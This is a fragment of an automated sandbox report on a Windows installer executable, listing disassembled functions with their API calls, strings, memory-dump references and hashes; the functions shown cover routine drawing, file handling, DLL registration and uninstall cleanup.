                                                              • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                              Function 00416D80 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RectVisible.GDI32(?,?), ref: 00416E13
                                                              • SaveDC.GDI32(?), ref: 00416E27
                                                              • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                              • RestoreDC.GDI32(?,?), ref: 00416E65
                                                              • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                              • FrameRect.USER32(?,?,?), ref: 00416F18
                                                              • DeleteObject.GDI32(?), ref: 00416F22
                                                              • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                              • FrameRect.USER32(?,?,?), ref: 00416F65
                                                              • DeleteObject.GDI32(?), ref: 00416F6F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                              • String ID:
                                                              • API String ID: 375863564-0
                                                              • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                              • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                              • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                              • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                              Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                              • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                              • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                              • String ID:
                                                              • API String ID: 1694776339-0
                                                              • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                              • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                              • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                              • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                              Function 004221E8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                              • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                              • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                              • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                              • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                              • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                              • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                              • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                              • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                              • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$EnableItem$System
                                                              • String ID:
                                                              • API String ID: 3985193851-0
                                                              • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                              • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                              • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                              • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                              Function 00481854 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 175windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                              • FreeLibrary.KERNEL32(02370000), ref: 00481A25
                                                              • SendNotifyMessageA.USER32(00010452,00000496,00002710,00000000), ref: 00481A97
                                                              Strings
                                                              • Deinitializing Setup., xrefs: 00481872
                                                              • GetCustomSetupExitCode, xrefs: 004818B1
                                                              • Restarting Windows., xrefs: 00481A72
                                                              • DeinitializeSetup, xrefs: 0048190D
                                                              • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary$MessageNotifySend
                                                              • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                              • API String ID: 3817813901-1884538726
                                                              • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                              • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                              • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                              • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                              Function 0046168C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                              • GetActiveWindow.USER32 ref: 0046172B
                                                              • CoInitialize.OLE32(00000000), ref: 0046173F
                                                              • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                              • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                              • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                              • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                              • String ID: A
                                                              • API String ID: 2684663990-3554254475
                                                              • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                              • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                              • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                              • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                              Function 004729F8 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                              • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                              • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                              • API String ID: 884541143-1710247218
                                                              • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                              • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                              • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                              • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                              Function 0045D2B4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(02370000,inflateInit_), ref: 0045D2BD
                                                              • GetProcAddress.KERNEL32(02370000,inflate), ref: 0045D2CD
                                                              • GetProcAddress.KERNEL32(02370000,inflateEnd), ref: 0045D2DD
                                                              • GetProcAddress.KERNEL32(02370000,inflateReset), ref: 0045D2ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                              • API String ID: 190572456-3516654456
                                                              • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                              • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                              • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                              • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                              Function 0041A8DC Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                              • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                              • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                              • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Color$StretchText
                                                              • String ID:
                                                              • API String ID: 2984075790-0
                                                              • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                              • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                              • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                              • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                              Function 004580C4 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseDirectoryHandleSystem
                                                              • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                              • API String ID: 2051275411-1862435767
                                                              • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                              • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                              • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                              • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                              Function 0044D178 Relevance: 13.6, APIs: 9, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                              • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                              • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                              • GetSysColor.USER32(00000010), ref: 0044D202
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Text$Color$Draw$OffsetRect
                                                              • String ID:
                                                              • API String ID: 1005981011-0
                                                              • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                              • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                              • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                              • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                              Function 0041B66C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFocus.USER32 ref: 0041B745
                                                              • GetDC.USER32(?), ref: 0041B751
                                                              • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                              • RealizePalette.GDI32(00000000), ref: 0041B792
                                                              • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                              • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Palette$Select$BitmapCreateFocusRealize
                                                              • String ID: %H
                                                              • API String ID: 3275473261-1959103961
                                                              • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                              • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                              • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                              • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                              Function 0041B93C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFocus.USER32 ref: 0041BA17
                                                              • GetDC.USER32(?), ref: 0041BA23
                                                              • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                              • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                              • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                              • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Palette$Select$BitmapCreateFocusRealize
                                                              • String ID: %H
                                                              • API String ID: 3275473261-1959103961
                                                              • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                              • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                              • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                              • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                              Function 004964F4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                              • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                              • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                              • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                              • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                              Strings
                                                              • Deleting Uninstall data files., xrefs: 004964FB
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                              • String ID: Deleting Uninstall data files.
                                                              • API String ID: 1570157960-2568741658
                                                              • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                              • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                              • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
